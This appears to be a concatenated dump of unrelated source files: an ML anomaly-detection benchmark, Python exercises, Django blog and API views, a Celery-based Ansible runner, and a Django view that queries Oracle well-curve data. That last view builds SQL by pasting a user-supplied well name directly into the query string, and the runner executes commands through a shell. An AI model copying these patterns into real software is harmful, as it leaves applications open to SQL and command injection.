column\nprint('tokenizing discrete features...')\ntokenizers = [kt.Tokenizer(num_words=1000) for i in xrange(len(idx_discrete))]\n\n# tokenize discrete columns\ndata_train_tokenized = datamodule.generate_tokens(tokenizers, data_train_disc)\nvocab_size = [min(len(tokenizers[i].word_index), tokenizers[i].num_words) for i in xrange(len(idx_discrete))]\nprint('vocab size of discrete features from training set : ' + str(vocab_size))\ndata_train_tokenized = np.array(data_train_tokenized, np.float32)\n\n# tokenize the test set based on the training set\ndata_test_tokenized = [tokenizers[i].texts_to_sequences(data_test_disc[:, i]) for i in range(len(idx_discrete))]\ndata_test_tokenized = np.array(data_test_tokenized).reshape(data_test_cont.shape[0], -1)\n\n# naive concat for tokinized values\n# needs embedding\ndata_train_x = np.concatenate((data_train_cont, data_train_tokenized), axis=1)\ndata_train_x = normalize(data_train_x, axis=0)\n\ndata_test_x = np.concatenate((data_test_cont, data_test_tokenized), axis=1)\ndata_test_x = normalize(data_test_x, axis=0)\n\ndata_train_y = []\nfor elem in data_train_class:\n if elem == 'normal':\n data_train_y.append(0.)\n else:\n data_train_y.append(1.)\n\ndata_test_y = []\nfor elem in data_test_class:\n if elem == 'normal':\n data_test_y.append(0.)\n else:\n data_test_y.append(1.)\n\nunique, counts = np.unique(data_train_y, return_counts=True)\nprint(dict(zip(unique, counts)))\nunique, counts = np.unique(data_test_y, return_counts=True)\nprint(dict(zip(unique, counts)))\n\n# split the train data for validation\ndata_train_x, data_valid_x, data_train_y, data_valid_y = train_test_split(data_train_x,\n data_train_y,\n test_size=0.2)\n\n#############################################\n\naction_dim = 1 # anomaly\nstate_dim = 41 # input dimension\nHIDDEN1_UNITS = 300\nHIDDEN2_UNITS = 600\nLRA = 0.0001\n\n\n# FF network with the same size of the actor network\n\nclass benchmark_FF():\n def __init__(self):\n S = Input(shape=[state_dim])\n h0 = Dense(HIDDEN1_UNITS, activation='relu')(S)\n h1 = Dense(HIDDEN2_UNITS, activation='relu')(h0)\n V = Dense(1, activation='sigmoid')(h1)\n model = Model(inputs=S, outputs=V)\n model.compile(Adam(LRA), loss='mse', metrics=['accuracy'])\n self.model = model\n\n\nbench_ff = benchmark_FF()\n\nlog_file = open('taining_log_bench_33persemi.txt', 'w+')\nfor i in range(100):\n # shuffle the dataset\n feed = list(zip(data_train_x, data_train_y))\n random.shuffle(feed)\n data_train_x, data_train_y = zip(*feed)\n data_train_x = np.array(data_train_x)\n data_train_y = np.array(data_train_y)\n\n accuracy_train = []\n for j in range(data_train_x.shape[0]):\n if i == 0:\n if j >= 9999:\n # train with ground truth one per 100 steps\n if j % 3 == 0:\n acc = bench_ff.model.train_on_batch(data_train_x[j].reshape(1, data_train_x[j].shape[0]),\n np.expand_dims(data_train_y[j], axis=0))\n accuracy_train.append(np.array(acc[1]))\n # train with pseudo-label for 99 steps\n else:\n pred = bench_ff.model.predict_on_batch(data_train_x[j].reshape(1, data_train_x[j].shape[0]))\n pseudo_label = np.around(pred[0][0])\n acc = np.where(pseudo_label == data_train_y[j], 1., 0.)\n accuracy_train.append(acc)\n bench_ff.model.train_on_batch(data_train_x[j].reshape(1, data_train_x[j].shape[0]),\n np.expand_dims(pseudo_label, axis=0))\n else:\n acc = bench_ff.model.train_on_batch(data_train_x[j].reshape(1, data_train_x[j].shape[0]),\n np.expand_dims(data_train_y[j], axis=0))\n accuracy_train.append(np.array(acc[1]))\n else:\n # train with ground truth one per 100 steps\n if j % 3 == 0:\n acc = bench_ff.model.train_on_batch(data_train_x[j].reshape(1, data_train_x[j].shape[0]),\n np.expand_dims(data_train_y[j], axis=0))\n accuracy_train.append(np.array(acc[1]))\n # train with pseudo-label for 99 steps\n else:\n pred = bench_ff.model.predict_on_batch(data_train_x[j].reshape(1, data_train_x[j].shape[0]))\n pseudo_label = np.around(pred[0][0])\n acc = np.where(pseudo_label == data_train_y[j], 1., 0.)\n accuracy_train.append(acc)\n bench_ff.model.train_on_batch(data_train_x[j].reshape(1, data_train_x[j].shape[0]),\n np.expand_dims(pseudo_label, axis=0))\n\n accuracy_train = np.mean(np.array(accuracy_train))\n\n preds_val = []\n for j in range(data_valid_x.shape[0]):\n preds_val.append(bench_ff.model.predict(data_valid_x[j].reshape(1, data_valid_x[j].shape[0]))[0][0])\n preds_val_ = np.where(np.array(preds_val) >= 0.5, 1, 0)\n accuracy_val = accuracy_score(data_valid_y, preds_val_)\n print(\"epoch\", i, \": train accuracy\", accuracy_train, \", validation accuracy \", accuracy_val)\n\n # epoch (equiv. as episode) / training accuracy / validation accuracy\n log_string = str(i) + '\\t' + \\\n str(accuracy_train) + '\\t' + \\\n str(accuracy_val) + '\\n'\n log_file.write(log_string)\n\n","sub_path":"benchmark_1persemi.py","file_name":"benchmark_1persemi.py","file_ext":"py","file_size_in_byte":7329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"33545217","text":"\"\"\"Tests for deprecated MyBMWVehicle.\"\"\"\nimport pytest\nimport respx\n\nfrom bimmer_connected.const import CarBrands\nfrom bimmer_connected.vehicle.vehicle import ConnectedDriveVehicle\n\nfrom . import (\n VIN_F31,\n VIN_G01,\n VIN_G20,\n VIN_G26,\n VIN_G70,\n VIN_I01_NOREX,\n VIN_I01_REX,\n VIN_I20,\n get_deprecation_warning_count,\n)\nfrom .conftest import prepare_account_with_vehicles\n\nATTRIBUTE_MAPPING = {\n \"remainingFuel\": \"remaining_fuel\",\n \"position\": \"gps_position\",\n \"cbsData\": \"condition_based_services\",\n \"checkControlMessages\": \"check_control_messages\",\n \"doorLockState\": \"door_lock_state\",\n \"updateReason\": \"last_update_reason\",\n \"chargingLevelHv\": \"charging_level_hv\",\n \"chargingStatus\": \"charging_status\",\n \"maxRangeElectric\": \"max_range_electric\",\n \"remainingRangeElectric\": \"remaining_range_electric\",\n \"parkingLight\": \"parking_lights\",\n \"remainingRangeFuel\": \"remaining_range_fuel\",\n \"updateTime\": \"timestamp\",\n \"chargingTimeRemaining\": \"charging_time_remaining\",\n}\n\n\n@pytest.mark.asyncio\nasync def test_parsing_attributes(caplog, bmw_fixture: respx.Router):\n \"\"\"Test parsing different attributes of the vehicle.\"\"\"\n account = await prepare_account_with_vehicles()\n\n for vehicle in account.vehicles:\n print(vehicle.name)\n assert vehicle.drive_train is not None\n assert vehicle.name is not None\n assert isinstance(vehicle.brand, CarBrands)\n assert vehicle.has_internal_combustion_engine is not None #\n assert vehicle.has_hv_battery is not None #\n assert vehicle.drive_train_attributes is not None\n assert vehicle.has_weekly_planner_service is not None #\n\n assert len(get_deprecation_warning_count(caplog)) == len(account.vehicles) * 3\n\n\n@pytest.mark.asyncio\nasync def test_drive_train_attributes(caplog, bmw_fixture: respx.Router):\n \"\"\"Test parsing different attributes of the vehicle.\"\"\"\n account = await prepare_account_with_vehicles()\n\n vehicle_drivetrains = {\n VIN_F31: (True, False, False),\n VIN_G01: (True, True, False),\n VIN_G20: (True, False, False),\n VIN_G26: (False, True, False),\n VIN_G70: (False, True, False),\n VIN_I01_NOREX: (False, True, False),\n VIN_I01_REX: (True, True, False),\n VIN_I20: (False, True, False),\n }\n\n for vehicle in account.vehicles:\n assert vehicle_drivetrains[vehicle.vin][0] == vehicle.has_internal_combustion_engine\n assert vehicle_drivetrains[vehicle.vin][1] == vehicle.has_hv_battery\n assert vehicle_drivetrains[vehicle.vin][2] == vehicle.has_range_extender\n\n assert len(get_deprecation_warning_count(caplog)) == len(account.vehicles) * 3\n\n\n@pytest.mark.asyncio\nasync def test_deprecated_vehicle(caplog, bmw_fixture: respx.Router):\n \"\"\"Test deprecation warning for ConnectedDriveVehicle.\"\"\"\n account = await prepare_account_with_vehicles()\n\n deprecated_vehicle = ConnectedDriveVehicle(account, account.vehicles[0].data)\n\n assert deprecated_vehicle is not None\n assert len(get_deprecation_warning_count(caplog)) == 1\n","sub_path":"bimmer_connected/tests/test_deprecated_vehicle.py","file_name":"test_deprecated_vehicle.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"469811378","text":"'''\r\n학번: 2016116457\r\n이름: 박범진\r\n주민등록번호 정상 판별 프로그램\r\n'''\r\n\r\n\r\nclass CheckNum:\r\n def __init__(self, num):\r\n self.num = num\r\n\r\n def input_num(self):\r\n self.num = input(\"주민등록번호를 숫자만 입력하세요: \")\r\n if len(self.num) > 13:\r\n print(\"주민등록번호가 13자리 보다 큽니다. 다시 입력하세요.\")\r\n return False\r\n elif len(self.num) < 13:\r\n print(\"입력된 숫자의 자리수가 13자리 이하입니다. 다시 입력하세요\")\r\n return False\r\n elif \"-\" in self.num:\r\n print(\"-를 빼고 다시 입력하세요.\")\r\n return False\r\n elif \" \" in self.num:\r\n print(\"공백 문자가 포함되었습니다. 다시 입력하세요.\")\r\n return False\r\n else:\r\n for item in self.num:\r\n if item.isalpha():\r\n print(\"알파벳 문자가 포함되었습니다. 다시 입력하세요.\")\r\n return False\r\n return True\r\n\r\n def distinguish(self):\r\n error_check = 2*int(self.num[0]) + 3*int(self.num[1]) + 4*int(self.num[2]) + 5*int(self.num[3])\\\r\n + 6*int(self.num[4]) + 7*int(self.num[5]) + 8*int(self.num[6]) + 9*int(self.num[7])\\\r\n + 2*int(self.num[8]) + 3*int(self.num[9]) + 4*int(self.num[10]) + 5*int(self.num[11])\r\n if int(self.num[12]) != (11 - error_check % 11) % 10:\r\n print(\"불법 생성된 주민등록번호입니다.\")\r\n return False\r\n return True\r\n\r\n def is_correct(self):\r\n print(\"정상적인 주민등록번호입니다.\")\r\n age = 2019 - int(\"19\" + self.num[0] + self.num[1])\r\n if age < 19:\r\n print(\"성인 인증이 실패하였습니다.\")\r\n return False\r\n local = int(self.num[7] + self.num[8])\r\n if 0 <= local <= 8:\r\n location = \"서울\"\r\n elif 9 <= local <= 12:\r\n location = \"부산\"\r\n elif 13 <= local <= 15:\r\n location = \"인천\"\r\n elif 16 <= local <= 25:\r\n location = \"경기\"\r\n elif 26 <= local <= 34:\r\n location = \"강원\"\r\n elif 35 <= local <= 47:\r\n location = \"충청\"\r\n elif 48 <= local <= 66:\r\n location = \"전라\"\r\n elif 67 <= local <= 91:\r\n location = \"경상\"\r\n elif 92 <= local <= 95:\r\n location = \"제주\"\r\n else:\r\n print(\"출생지 인증이 실패하였습니다.\")\r\n return False\r\n birth = \"\"\r\n for i in range(6):\r\n birth += self.num[i]\r\n print(\"성인 인증이 되었습니다. 나이\", age, \"세\")\r\n print(\"주민등록번호:\", self.num)\r\n print(\"생년월일:\", birth)\r\n print(\"출생지:\", location)\r\n\r\n\r\nmyNum = CheckNum(\"\")\r\nwhile True:\r\n if myNum.input_num():\r\n if myNum.distinguish():\r\n myNum.is_correct()\r\n break\r\n","sub_path":"Python_programming/check_number.py","file_name":"check_number.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365216578","text":"import encode\nimport decode\n\n\nprint(\"{0:08b}\".format(127))\n\n\na = encode.Encode()\nencode_data = (a.network_interface(a.internet(a.transport(a.application('text', 'HTTP'), 'TCP')), 1))\n\nten_base = int(encode_data[0], base=2)\n\nprint(ten_base)\n\nb = decode.Decode()\ndata_from_network = b.network_interface (encode_data[0],1)\nprint ('network_interface level - ', data_from_network, len(data_from_network[0]))\ndata_ip = b.internet(data_from_network)\nprint ('internet level - ', data_ip, len(data_ip))\ndata_transport = b.transport (data_ip)\nprint ('transport level - ', data_transport, len(data_transport[0]))\ndata_app = b.application(data_transport)\nprint ('application level - ', data_app)\n","sub_path":"network/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339596491","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\n\nimport sys\nargs = sys.argv\n\n\n# string and digit\n\nstring = \"Welcome to Hitachi ID!\"\nprint(\"\\n\\nstring var contains:\", string)\n\ndigits = 5 \nprint(\"digits var contains:\", digits)\n\n# upper\n\nstring = string.upper()\nprint(\"\\nUpper:\", string)\n\n# join\n\nhello = \"Hello, world!\"\nwelcome = ' '.join([hello, string])\nprint(\"\\nUsing join:\", welcome)\n\n# slices\n\nslice_string = \"The quick brown fox jumped over the house while walking home\"\nslice_1 = slice_string[:9]\nslice_2 = slice_string[16:19]\nslice_3 = slice_string[-19:]\nslice_4 = slice_string[20:-25]\nslice_5 = slice_string[10:15]\nslice_6 = slice_string[-24:-19]\n\nprint(\"\\nOriginal string:\", slice_string)\nprint(\"Using slices:\", slice_1, slice_2, slice_3, slice_4, slice_5, slice_6)\n\n# format\n\nmonth = \"January\"\nstart_date = \"\\nFormat: %s. I started on %s %d\" % (welcome, month, digits)\nprint(start_date)\n\n# conditional (if args, elif condition)\n\nprint(\"\\nConditional...\\n\")\n\ncond = 10\n\nif(len(args) > 1):\n for i,word in enumerate(args):\n if i == 0:\n next\n print(word)\nelif(cond != 10):\n print(\"Nothing to see here\")\nelse:\n print(welcome)\n \n","sub_path":"python/py_google-python-exercises/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"182609734","text":"class Solution(object):\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n\n count = 0\n for n in nums:\n if n != 0:\n count += 1\n\n count2 = 0\n for i in range(len(nums)):\n if nums[i] != 0:\n nums[count2] = nums[i]\n count2 += 1\n\n for i in range(count, len(nums)):\n nums[i] = 0\n","sub_path":"Challenges/MoveZeros.py","file_name":"MoveZeros.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"415788647","text":"import copy\n\nfrom plenum.test.test_node import ensureElectionsDone\nfrom plenum.test.view_change.helper import add_new_node\n\nfrom plenum.test.helper import checkViewNoForNodes\nfrom plenum.test.pool_transactions.helper import demote_node\n\nnodeCount = 6\n\nold_commit = None\n\n\ndef test_future_primaries_replicas_increase(looper, txnPoolNodeSet, sdk_pool_handle,\n sdk_wallet_stewards, tdir, tconf, allPluginsPath):\n # Don't delete NodeStates, so we could check them.\n global old_commit\n old_commit = txnPoolNodeSet[0].write_manager.future_primary_handler.commit_batch\n for node in txnPoolNodeSet:\n node.write_manager.future_primary_handler.commit_batch = lambda three_pc_batch, prev_handler_result=None: 0\n\n initial_primaries = copy.copy(txnPoolNodeSet[0].primaries)\n last_ordered = txnPoolNodeSet[0].master_replica.last_ordered_3pc\n starting_view_number = checkViewNoForNodes(txnPoolNodeSet)\n\n # Increase replicas count\n add_new_node(looper, txnPoolNodeSet, sdk_pool_handle, sdk_wallet_stewards[0], tdir, tconf, allPluginsPath)\n\n new_view_no = checkViewNoForNodes(txnPoolNodeSet)\n assert new_view_no == starting_view_number + 1\n # \"seq_no + 2\" because 1 domain and 1 pool txn.\n state = txnPoolNodeSet[0].write_manager.future_primary_handler.node_states[-1]\n assert len(state.primaries) == len(initial_primaries) + 1\n assert len(state.primaries) == len(txnPoolNodeSet[0].primaries)\n\n\ndef test_future_primaries_replicas_decrease(looper, txnPoolNodeSet, sdk_pool_handle,\n sdk_wallet_stewards, tdir, tconf, allPluginsPath):\n assert len(txnPoolNodeSet) == 7\n\n initial_primaries = copy.copy(txnPoolNodeSet[0].primaries)\n last_ordered = txnPoolNodeSet[0].master_replica.last_ordered_3pc\n starting_view_number = checkViewNoForNodes(txnPoolNodeSet)\n\n # Decrease replicas count\n demote_node(looper, sdk_wallet_stewards[-1], sdk_pool_handle, txnPoolNodeSet[-2])\n txnPoolNodeSet.remove(txnPoolNodeSet[-2])\n ensureElectionsDone(looper=looper, nodes=txnPoolNodeSet)\n\n new_view_no = checkViewNoForNodes(txnPoolNodeSet)\n assert new_view_no == starting_view_number + 1\n state = txnPoolNodeSet[0].write_manager.future_primary_handler.node_states[-1]\n assert len(state.primaries) + 1 == len(initial_primaries)\n assert len(state.primaries) == len(txnPoolNodeSet[0].primaries)\n\n for node in txnPoolNodeSet:\n node.write_manager.future_primary_handler.commit_batch = old_commit\n","sub_path":"plenum/test/audit_ledger/test_future_primaries_addition.py","file_name":"test_future_primaries_addition.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"564689107","text":"\"\"\"\n输入学生考试成绩计算平均分\n\"\"\"\n\ndef main():\n \n number = int(input(\"请输入学生人数:\"))\n names = [None] * number\n scores = [None] * number\n \n for index in range(len(names)):\n names[index] = input(\"请输入第【%d】个学生的姓名:\" % (index + 1))\n scores[index] = float(input(\"请输入第【%d】个学生的成绩:\" % (index + 1)))\n \n totalScore = 0\n\n for index in range(len(names)):\n print(\"%s: %.1f 分\" % ( names[index], scores[index]))\n totalScore += scores[index]\n\n print(\"平均分为: %.1f\" % (totalScore / number))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"day07/avgscore.py","file_name":"avgscore.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418075232","text":"from celery import Celery\nimport subprocess\nfrom subprocess import Popen, PIPE\nfrom flansible import api, app, celery, task_timeout\nimport time\nimport re\nimport redis\n\nrdis = redis.StrictRedis(host='localhost', port=6379, db=0)\n\n@celery.task(bind=True, soft_time_limit=task_timeout, time_limit=(task_timeout+10))\ndef do_long_running_task(self, cmd, type='Ansible'):\n with app.app_context():\n \n has_error = False\n result = None\n output = ''\n self.update_state(state='PROGRESS',\n meta={'output': output, \n 'description': \"\",\n 'returncode': None})\n print(str.format(\"About to execute: {0}\", cmd))\n proc = Popen([cmd], stdout=PIPE, stderr=subprocess.STDOUT, shell=True)\n\n playstarted = 0\n taskstarted = 0\n totalTaskTime = 0\n totalPlayTime = 0\n\n # task name match\n tmatch = ''\n # playbook name match\n pmatch = ''\n taskName = re.compile('TASK \\[(\\w+[\\s+\\w+]+)]')\n playName = re.compile('PLAY \\[(\\w+[\\s+\\w+]+)]')\n\n for line in iter(proc.stdout.readline, ''):\n\n if re.match('^PLAY', line):\n p = playName.match(line)\n if p:\n playstarted = float(\"{:0.2f}\".format( time.time()))\n # Check for previous runtime in rdis\n pmatch = p.group(1)\n print(pmatch)\n # found previous runtime\n if rdis.exists(pmatch):\n # number of times run\n countkey = pmatch + \"_count\"\n rdis.incr(countkey)\n\n avg = \"{:0.2f}\".format( float(rdis.get(pmatch)) / float(rdis.get(countkey)))\n line = line.replace('\\n', '')\n line = str.format(\"{0} (Avg {1} secs, {2} runs) \\n\", line, avg, rdis.get(countkey))\n\n else:\n countkey = pmatch + \"_count\"\n # Play recap\n playended = float(\"{:0.2f}\".format( time.time()))\n totalPlayTime = float(\"{:0.2f}\".format((playended - playstarted)))\n\n if not rdis.exists(pmatch):\n rdis.set(pmatch, float(totalPlayTime))\n\n # Update rdis task total time\n ptime = float(\"{:0.2f}\".format(float(rdis.get(pmatch))))\n rdis.set(pmatch, float(ptime) + float(totalPlayTime) )\n\n # remove last new line\n line = line.replace('\\n', '')\n diffsign = ''\n diffval = 0\n\n avgtime = ptime / float(rdis.get(countkey))\n\n if avgtime < totalPlayTime :\n diffsign = \"+\"\n diffval = float(\"{:0.2f}\".format( (totalPlayTime - avgtime) ))\n\n elif avgtime > totalPlayTime :\n diffsign = \"-\"\n diffval = float(\"{:0.2f}\".format((avgtime - totalPlayTime)))\n line = str.format(\"{0} : {1} seconds ({2}{3} secs)\\n\", line, totalPlayTime , diffsign, diffval)\n \n if re.match('^TASK', line):\n taskstarted = \"{:0.2f}\".format( time.time())\n p = taskName.match(line)\n if p:\n # Check for previous runtime in rdis\n tmatch = p.group(1)\n print(tmatch)\n # found previous runtime\n if rdis.exists(tmatch):\n # number of times run\n countkey = tmatch + \"_count\"\n rdis.incr(countkey)\n\n avg = \"{:0.2f}\".format( float(rdis.get(tmatch)) / float(rdis.get(countkey)))\n line = line.replace('\\n', '')\n line = str.format(\"{0} (Avg {1} secs, {2} runs) \\n\", line, avg, rdis.get(countkey))\n\n if re.match('^[ok|changed|fatal]', line):\n totalTaskTime = float(\"{:0.2f}\".format((time.time() - float(taskstarted))))\n\n if not rdis.exists(tmatch):\n rdis.set(tmatch, float(totalTaskTime))\n\n # Update rdis task total time\n ttime = float(\"{:0.2f}\".format(float(rdis.get(tmatch))))\n rdis.set(tmatch, float(ttime) + float(totalTaskTime) )\n\n # remove last new line\n line = line.replace('\\n', '')\n\n diffsign = ''\n diffval = 0\n\n avgtime = ttime / float(rdis.get(countkey))\n\n if avgtime < totalTaskTime :\n diffsign = \"+\"\n diffval = float(\"{:0.2f}\".format( (totalTaskTime - avgtime) ))\n\n elif avgtime > totalTaskTime :\n diffsign = \"-\"\n diffval = float(\"{:0.2f}\".format((avgtime - totalTaskTime)))\n \n else:\n diffsign = ''\n diffval = 0.0\n\n line = str.format(\"{0} : {1} seconds ({2}{3} secs)\\n\", line, totalTaskTime , diffsign, diffval)\n # print(line)\n\n output = output + line\n self.update_state(state='PROGRESS', meta={'output': output, 'description': \"\", 'returncode': None})\n\n return_code = proc.poll()\n if return_code is 0:\n meta = {'output': output, \n 'returncode': proc.returncode,\n 'description': \"\"\n }\n self.update_state(state='FINISHED',\n meta=meta)\n elif return_code is not 0:\n #failure\n meta = {'output': output, \n 'returncode': return_code,\n 'description': str.format(\"Celery ran the task, but {0} reported error\", type)\n }\n self.update_state(state='FAILED',\n meta=meta)\n if len(output) is 0:\n output = \"no output, maybe no matching hosts?\"\n meta = {'output': output, \n 'returncode': return_code,\n 'description': str.format(\"Celery ran the task, but {0} reported error\", type)\n }\n return meta\n","sub_path":"Flansible/flansible/celery_runner.py","file_name":"celery_runner.py","file_ext":"py","file_size_in_byte":6458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"109047259","text":"from app import db\nfrom flask import render_template, request, redirect, url_for #current_app as app, not needed here, becase we don't need to reference anything from the app instance, we only reference main instance \nfrom app.blueprints.auth.models import User\nfrom app.blueprints.blog.models import Post \nfrom flask_login import login_user, current_user, logout_user, login_required \nfrom .import bp as main_bp\n\n\n## password HASHING + SALTING\n#HASHING - alto where a particular character has a specified translation, con is can be decipher\n#SALTING - encrypeted password will be different for two same pwd\n\n\n@main_bp.route('/')\ndef home():\n if current_user.is_authenticated:\n posts = current_user.followed_posts().all()\n else:\n posts = [] #for display to anonymous users \n context = {\n 'user': current_user,\n 'posts': posts \n # 'posts': Post.query.order_by(Post.date_created.desc()).all()\n }\n return render_template('home.html', **context)\n\n@main_bp.route('/profile')\n@login_required\ndef profile():\n context = {\n 'posts': [p for p in Post.query.order_by(Post.date_created.desc()).all() if p.user_id == current_user.id]\n }\n return render_template('profile.html', **context)\n\n@main_bp.route('/contact')\ndef contact():\n return render_template('contact.html')\n\n@main_bp.route('/explore') #pass that dictionary to my route \n@login_required\ndef explore(): \n context = {\n 'users': [user for user in User.query.all() if current_user.id != user.id ] # not showing myself as followers on explore page\n }\n return render_template('explore.html', **context)\n\n\n","sub_path":"app/blueprints/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"530410967","text":"\"\"\"myblog URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path, include \r\nfrom django.conf.urls import url\r\nfrom database import views\r\nfrom database.views import home_view, detail_view, user_create_view, delete_view, list_view, search\r\n\r\n\r\nurlpatterns = [\r\n path('', views.home_view, name='home'),\r\n path('detail//', views.detail_view, name='detail'),\r\n path('admin/', admin.site.urls),\r\n path('create/', user_create_view, name='create_view'),\r\n path('detail/', list_view, name='list'),\r\n\r\n path('api-auth/', include('rest_framework.urls')),\r\n path('api/', include('database.api.urls')),\r\n\r\n url(r'results/$', search, name=\"results\"),\r\n path('detail//update/', views.update_view, name='update'),\r\n url(r'^delete/(?P[0-9]+)/$', views.delete_view, name='delete_view'),\r\n]\r\n","sub_path":"myblog/myblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"595394760","text":"from django.conf.urls import patterns, url\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom apiservice import views\nfrom django.conf.urls import include\n\n\nurlpatterns = patterns('',\n # For master list related stuff\n url(r'^usermasterlistitems/$', views.UserMasterListItemList.as_view()),\n url(r'^usermasterlistitems/(?P[0-9]+)/$', views.UserMasterListItemDetail.as_view()),\n #url(r'^usermasterlistitem/$', views.UserMasterListItemDetail.as_view()),\n\n # For Current list related stuff\n url(r'^usercurrentlistitems/$', views.UserCurrentListItemView.as_view()),\n url(r'^usercurrentlistitems/(?P[0-9]+)/$', views.UserCurrentListItemDetail.as_view()),\n\n # For user creation and listing\n url(r'^users/$', views.UserView.as_view()),\n url(r'^users/(?P[0-9]+)/$', views.UserView.as_view()),\n #url(r'^users/(?P[0-9]+)/$', views.UserDetail.as_view()),\n #url(r'^users/', views.UserView),\n\n # For master list item template actions\n url(r'^masterlistitemtemplates/$', views.MasterListItemTemplateList.as_view()),\n url(r'^masterlistitemtemplates/(?P[0-9]+)/$', views.MasterListItemTemplateDetail.as_view()),\n\n url(r'^createdefaultmasterlist', views.createDefaultMasterList),\n url(r'^createdefaultcurrentlist', views.createCurrentListFromMasterList),\n url(r'^additemtouserslist', views.addItemToUsersList),\n url(r'^getitemdetails', views.getItemDetails),\n url(r'^usercategories/$', views.UserCategoryView.as_view()),\n url(r'^userpreferences/$', views.UserPreferenceView.as_view()),\n url(r'^addusersdevice/$', views.addUsersDevice),\n\n)\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n\n#For authorizing the user ??\nurlpatterns += patterns('',\n url(r'^api-auth/', include('rest_framework.urls',\n namespace='rest_framework')),\n)\n\n# To login and get an auth token\nurlpatterns += patterns('',\n url(r'^api-token-auth/', 'rest_framework.authtoken.views.obtain_auth_token')\n)\n","sub_path":"apiservice/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"253854296","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def isValidBST(self, root: TreeNode) -> bool:\n def helper(node, lower=float('-inf'), upper=float('inf')):\n if not node:\n return True\n if not (node.val > lower and node.val < upper):\n return False\n\n return helper(node.left, lower, node.val) and helper(node.right, node.val, upper)\n\n return\n\n return helper(root)\n\n\nt1 = TreeNode(5)\nt1.left = TreeNode(3)\nt1.right = TreeNode(1)\nslu = Solution()\nprint(slu.isValidBST(t1))\n\nprint(float('-inf') < -1000000)\nprint(float('inf') > 1000000)\n","sub_path":"leetcode/python/medium/p098_isValidBST.py","file_name":"p098_isValidBST.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368457533","text":"import os\nimport datetime\nimport numpy\nimport pandas as pd\nfrom django.db import connection\nfrom django.conf import settings\n# 导入消息模块\nfrom django.contrib import messages\n\nfrom . import helper\nfrom .data_signal import API_func as img_save\n\n\ncursor = settings.DEFAULT_CURSOR\norcl_cursor = settings.ORACLE_CURSOR\n\n\ndef index_get_1(name):\n \"\"\"电参首页数据展示\"\"\"\n query_set = []\n if not name:\n # sql = 'SELECT ID, WELLID, CREATEDATE FROM (SELECT ROWNUM AS rowno, ID, WELLID, CREATEDATE FROM SKYCLOUD.DC_WELLCURVE WHERE ROWNUM <= 20) table_alias WHERE table_alias.rowno >= 11;'\n # orcl_cursor.execute(sql)\n # 查询前20调数据\n orcl_cursor.execute('SELECT ID, WELLID, CREATEDATE FROM SKYCLOUD.DC_WELLCURVE WHERE ROWNUM <= 100')\n rows = orcl_cursor.fetchall()\n if rows:\n for row in rows:\n well_dict = {}\n well_dict['id'] = row[0]\n well_dict['createdate'] = row[2]\n # 查询对应曲线的井名\n cursor.execute('SELECT WELLNAME FROM WELLNAME WHERE WELLID=%s' % row[1])\n well_row = cursor.fetchone()\n if well_row:\n well_dict['wellname'] = well_row[0]\n else:\n well_dict['wellname'] = None\n query_set.append(well_dict)\n else:\n query_set = query_set\n else:\n # 查询对应井名的曲线id\n cursor.execute('SELECT WELLID FROM WELLNAME WHERE WELLNAME=\"%s\"' % name)\n well_row = cursor.fetchone()\n if well_row:\n # 查询前20条曲线数据\n orcl_cursor.execute(\n 'SELECT ID, WELLID, CREATEDATE FROM (SELECT * FROM SKYCLOUD.DC_WELLCURVE WHERE WELLID={}) '\n 'WHERE ROWNUM <= 100'.format(well_row[0]))\n rows = orcl_cursor.fetchall()\n if rows:\n for row in rows:\n well_dict = {}\n well_dict['id'] = row[0]\n well_dict['createdate'] = row[2]\n well_dict['wellname'] = name\n 